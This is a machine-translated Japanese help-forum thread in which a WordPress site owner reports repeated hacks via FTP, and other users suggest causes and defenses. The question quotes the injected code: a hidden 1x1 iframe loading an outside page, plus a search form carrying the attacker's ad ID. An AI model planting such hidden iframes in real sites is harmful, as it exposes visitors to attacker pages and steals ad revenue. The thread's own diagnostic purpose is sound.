web-dev-qa-db-ja.com

ウェブサイトが再びハッキングされた

最終更新:

過去数週間、物事は平和であり、ウェブサイトのセキュリティとリスクについて多くのことを教えてくれました。これが私のバージョンのストーリーです-

私は古いバージョンのwordpressを使用していましたが、おそらくこの人がGoogleから私を捕まえました。これはスクリプト攻撃だったと思います。セキュリティが実際にいつどのように侵害されたかはわかりません。 2009年11月5日の通知。その時点でいくつかの安全対策を講じていましたが(以下で説明)、仕事用のコンピューターをフォーマットしたときにwordpressパスワードの変更を見逃した可能性が常にあります。

これで、不要なphpスクリプトをすべてホスティングから削除し、管理部分に自分のIPのみがアクセスできるようにし、ベトナムに属する特定のIP範囲をブロックしました。毎日のバックアップやその他のもの。重要なのは、関係する変数が非常に多く、すべてを追跡するのが難しすぎるということです。そのためのメインレッスンが用意されています。 :)

私はGoDaddyによる共有ホスティングプランを利用しており、WordPressウェブサイトを運営しています。私のウェブサイトは2009年11月5日に初めてハッキングされました。そのとき、ハッカー私の広告を彼自身のものに置き換えましたセキュリティの怠惰のために起こったと思いましたが、私はとても間違っていました。

コンピューターをフォーマットして、すべてを再セットアップしました。 ESETNOD32をMicrosoftSecurityEssentialsに置き換えました。 WordPressの最新バージョンにアップグレードしました。すべてのパスワードを変更しました。新しいデータベースをセットアップします。そして、私があちこちで読んだ他のセキュリティ関連のもの。私のサイトが今日再びハッキングされるまで、物事はしばらくの間うまくいきました。

前回、その男はたくさんのファイルで遊んで、特にfooter.phpとすべての広告関連ファイルを変更しました。しかし今回、彼はちょうど正しい場所に行き、次のコードに置き換えました-

<IFRAME height=1 src="http://blackberryrss.com/check.html" frameBorder=0 width=1></IFRAME>

<form action="http://www.google.com/cse" id="cse-search-box">
  <div>
    <input type="hidden" name="cx" value="partner-pub-2815780429722377:hhm6d0-6wfw" />

    <input type="hidden" name="ie" value="ISO-8859-1" />
    <input type="text" name="q" size="31" />
    <input type="submit" name="sa" value="Search" />
  </div>
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en"></script>

その人はデータベースなどの操作には興味がないようですが、コードを配置してすぐにお金を稼ぐだけです。 Godaddyが私のftpログを転送し、IPからの不正アクセスがありました-117.2.56.31。このIPはベトナムに属しており、 http://blackberryrss.com はベトナムと何らかの関係があります。

アカウントへのSSHアクセスがなく、FireFTPを使用してFTPに接続します。これは前回のGoDaddyの応答でした-

アカウントを確認したところ、ローカルコンピュータのマルウェアまたはFTP /ホスティングパスワードの脆弱性が原因で、FTPアカウントが侵害されていることがわかりました。

しかし、私はすべてのパスワードを変更したり、アカウントを削除したりしましたが、何も機能していないようです。私は今のところ無知です。どうしたらいいか教えてください。アカウントへの不正アクセスを防ぐにはどうすればよいですか????

追加の詳細:

  • パスワードの強度は強力ですが、最善ではありません。
  • 私は個人的にWindows XP SP3、Windowsファイアウォールなどを使用しています。最初の攻撃の後、ユーザーアカウントを使用して作業し、管理者アカウントを回避することを学びました。
  • 最初の攻撃のFTPログを見ると、人がこれらすべてを手動で行っていることは明らかです。
hostingftppasswordhackinggodaddy
7
Arpit Tambi

FTPはパスワードをクリアテキストで送信することに注意してください。したがって、妥協の可能性は間違いなくあります。

考慮すべきもう一つのことは、あなたのFTPパスワードはあなたのホスティングにユニークですか?他の場所では使用していませんか?他のアカウント、ウェブサイトなどはありませんか?

あなたのメールパスワードはどれくらい安全ですか?私は、「弱いリンク」が実際にはEMAILパスワードであり、犯人が「パスワードを忘れた」を電子メールに送信し、電子メールボックスから証拠を削除しているときに、誰もが侵害されたサーバーに集中するのに忙しい場合に関与しました。通知。

頭に浮かんだのはほんの少しです...もちろん、他のいくつかのことは、ISPを使用したソーシャルエンジニアリングのアプローチ、サーバーまたはホスティングしているパッケージの1つに対するソフトウェアの脆弱性です。

もっと(明らかに)ありますが、それらは通常「通常の容疑者」です。

更新:

この新しい情報(ハッカーがFTPを使用してファイルを変更していない)に基づいて、最も可能性の高い原因はおそらくセキュリティで保護されていないWebアプリであると推測できます。

それが可能なのはそれだけではありませんが、このような場合が最も可能性が高いです。

考慮すべき(そしてチェックする)もう1つのことは、彼がアプリに何らかの「裏口」を残したかどうかです。あなたのISPがFTP経由でやってきたと言ったことを前に言ったことを覚えているようです。彼が初めてFTP経由で入ってきて、バックドアを離れた可能性はありますか?

また、暗闇の中でのショットですが、ハッカーが1回しか来なかったが、ファイルやその他のさまざまな悪を変更し続けるcronジョブを残した、侵害されたボックスを個人的に目撃しました。ハッカーが戻ってこなかったのに、自動化されたスクリプトを扱っている可能性はありますか?他のすべての可能性を使い果たしたと感じたかどうかを確認するための何か。

最後に、Webログ、システムログなどにアクセスできますか?もしそうなら、彼らは何と言いますか?彼らは何か手がかりを明らかにしますか?

8
KPWINC

あなたは読みたいかもしれません 詳細投稿-モーテムのWordPressハックWordPressブログハック に関する多くの情報を提供する別の投稿リンク付き。WordPress自体には [〜#〜] faq [〜#〜] ブログがハッキングされた後に何をすべきかについてあります。

WordPressは、人気があるという理由だけで、ターゲットを絞ったアプリケーションです。それらのサイトのハッカーと戦うことはフルタイムの仕事です。あなたの説明から、誰かがWordPressの悪用者がそれを最大限に活用していることを発見したようです。あなたは今のところすべてを正しくやっているように聞こえますが、私は攻撃者はあなたのサイトにファイルをドロップし、その方向から攻撃します。私があなたに指摘した最初のリンクは、これとそれに対抗するために彼らが取ったステップの非常に詳細な説明に入ります。

結局、WordPressから別のブログアプリケーションに変更することを考えなければならないかもしれません。頑張って自分を守ってください。これが役立つことを願っています。

2
Chris

GoDaddyは SSHアクセス を提供し、ポート22でPuTTY.exeを使用してアカウントに接続できます。接続したら、PuTTYを使用してポート20と21に2つのプロキシ/トンネルを作成できます。保護されたトンネルを介してftpを使用して、ファイルにアクセスします。

または、さらに良いことに、 PSFTP.exe コマンドを使用して同じことをはるかに簡単に行うか、FileZillaクライアントを使用してポート22に接続することができます。

1
djangofan

ばかげた質問ですが、パスワードを変更して別のコンピューターを使用してみましたか?たぶんあなたのPCにキーストロークロガーがあります。

私はここでいたずら、または少なくとも標的型攻撃を疑っています。あなたが知っている誰かがそのような冗談を喜んでプレイしますか..?

偏執的になりすぎる前に、箱から出してください。助けになる。

ps:またはおそらく誤用されたwordpressテーマ。またはDBアクセスの資格情報が間違っています。

1
lorenzog

すべてのFTPセッションを安全なトンネルを介して実行しない限り(または、さらに良いのはsftpを使用して)、そのパスワードは盗聴されます。

私たちの標準的な方法は、FTPをまったくオンにしないことです。必要に応じて、匿名ftpのみを許可し、それを既知の領域に厳しく制限します。

アップロードが必要な場合は、アップロードディレクトリへの掲載を禁止します。

1
lcbrevard

あなたのFTPパスワードが盗聴されています、それはそこでホストされている私たちのサイトでたくさん起こります。

0
Dan

正直に言うと、ファイアウォールレベルでそのIPをブロックするようにISPに依頼します。 GoDaddyがそれを望まない場合、私には、彼らはあなたのデータを保護するための措置を講じない無責任なホスティング業者であるように思われるので、切り替える必要があります。

blackberryrss.comは米国にあるため、次のようなレバレッジを利用できます。
DNSスタッフ

ここで出版社IDを報告してください、グーグルは彼らのアドセンスネットワーク内の不正行為に関して非常に深刻です。 グーグルアドセンスの乱用を報告する

実際、正直に言うと、そのIPの逆引きDNSは「localhost」であり、これは巨大な危険信号であるため、GoDaddyはそれを許可するべきではありません。 1つのIPv4アドレスのみがローカルホストに解決される必要があります(もちろん、標準のIPアドレスについて話していると仮定します)。これは127.0.0.1です。 DNSスタッフ

うさぎの穴をさらに深く掘り下げるには、bluehostがサーバーをホストしているように見えるので、リングを渡して、何をしたいのかを確認します(ある場合)。

また、いつでも地方自治体に報告するオプションがあります(アクセスする権利や特権がないネットワークやコンピューターにアクセスすることは犯罪です)

0
Natalie Adams